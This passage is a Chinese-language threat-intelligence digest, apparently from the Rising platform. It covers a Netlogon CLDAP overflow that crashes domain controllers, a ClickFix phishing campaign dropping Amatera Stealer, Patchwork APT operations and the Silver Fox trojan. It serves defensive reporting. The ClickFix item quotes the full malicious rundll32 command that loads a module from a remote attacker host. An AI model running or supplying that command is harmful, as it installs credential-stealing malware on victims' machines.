近日,微软发布安全更新修补了位于Windows Netlogon服务中的基于栈的缓冲区溢出高危漏洞,CVE编号为CVE-2026-41089。当活动目录域控制器在处理无连接轻量级目录访问协议(CLDAP)的搜索请求时,其DC定位器ping响应句柄未对数据边界进行有效检查,导致远程未授权的攻击者可以通过向目标域控制器的UDP 389端口发送单个精心构造的CLDAP数据包,直接引发本地安全机构子系统服务(LSASS)进程崩溃,并迫使域控制器发生强制重启。该漏洞的成功触发具有特定前置条件,即目标域控制器必须配置有较长的DNS域名(50个字符以上)。
瑞星威胁情报平台近期捕获到一起利用ClickFix战术实施的钓鱼攻击活动。攻击者通过伪造验证页面并仿冒合法机构主题内容,诱导受害者在本机执行恶意命令:rundll32.exe \\r2-gate-entry.terralibre.in.net@80\verification.google,#1,随后从远程加载恶意模块并投放Amatera Stealer窃密木马。
瑞星威胁情报平台近期捕获到Patchwork组织针对国内科教领域及土耳其国防领域的多起定向攻击。攻击者以伪装成PDF文档的快捷方式(.lnk)作为初始载荷,通过混淆的PowerShell命令从远程服务器下载诱饵文档与多个恶意程序,然后利用计划任务实现本地持久化。下载到本地的执行文件会解密出由开源工具Donut生成的ShellCode并最终运行NorthStarC2及BADNEWS远程控制木马。
Patchwork组织,又名摩诃草、白象、APT-Q-36、Dropping Elephant,是一个疑似具有南亚某政府背景的APT组织,其最早攻击活动可追溯到2009年,至今依然活跃。该组织主要针对中国、巴基斯坦、孟加拉国等亚洲地区国家,以政府、军事、电力、工业、科研教育、外交和经济等高价值机构为攻击目标。
银狐木马作为数年前在国内开始流行的一类远控木马,时至今日活跃度只增不减。近期瑞星威胁情报平台在日常运营中捕获到多起攻击案例,现对相关案例分类进行详细分析